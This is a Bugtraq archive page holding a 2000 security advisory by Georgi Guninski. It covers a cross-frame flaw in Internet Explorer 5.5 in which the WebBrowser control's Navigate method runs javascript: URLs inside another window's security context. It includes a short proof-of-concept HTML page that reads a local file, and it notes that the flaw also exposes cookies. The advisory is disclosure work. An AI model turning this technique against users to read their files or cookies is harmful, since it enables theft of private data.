Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

IE 5.5 Cross Frame security vulnerability - Web Browser Control's Navigate method

From: Georgi Guninski <joro () NAT BG>
Date: Mon, 4 Sep 2000 16:26:17 +0300
Georgi Guninski security advisory #20, 2000

IE 5.5 Cross Frame security vulnerability - Web Browser Control's
Navigate method

Systems affected:
IE 5.5/Win98. Probably other versions - have not tested.


Risk: High
Date: 4 September 2000

Legal Notice:
This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute
it unmodified. You may not modify it and distribute it or distribute
parts of it without the author's written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or  indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.


Description:
Internet Explorer 5.5 under Windows 98 (suppose all other versions are
also vulnerable)
allows circumventing "Cross frame security policy" by accessing the DOM
of documents using JavaScript and WebBrowser control.
This exposes the whole DOM of the target document and opens lots of
security risks.
This allows reading local files, reading files from any host, window
spoofing, getting cookies, etc.
Reading cookies from arbitrary hosts is dangerous, because some sites
use cookies for authentication.


Details:

The problem is Web Browser's control allows opening javascript: URLs in
already opened documents
by using its Navigate method.
The code in the javascript: URLs is executed in the security context of
the target document and has full access to its DOM.
First, a target document is opened in a new named window and then Web
Browser's control Navigate method
is invoked to open a javascript: URLs in the target named window.
Examine the code for details.


The code is:
------webctrl1.html--------------------------------
<object id=web2
   classid="clsid:8856F961-340A-11D0-A96B-00C04FD705A2"



</object>
<SCRIPT>
alert("This script reads C:\\TEST.TXT\nYou may need to create it");
a=window.open("file://c:/test.txt","A");
setTimeout('web2.Navigate("javascript:alert(document.body.innerText)","","A");',2000);
</SCRIPT>
---------------------------------------------------

Demonstration is available at: http://www.nat.bg/~joro/webctrl1.html

Workaround: Disable Active Scripting


Regards,
Georgi Guninski
http://www.nat.bg/~joro
Previous By Date Next
Previous By Thread Next

Current thread: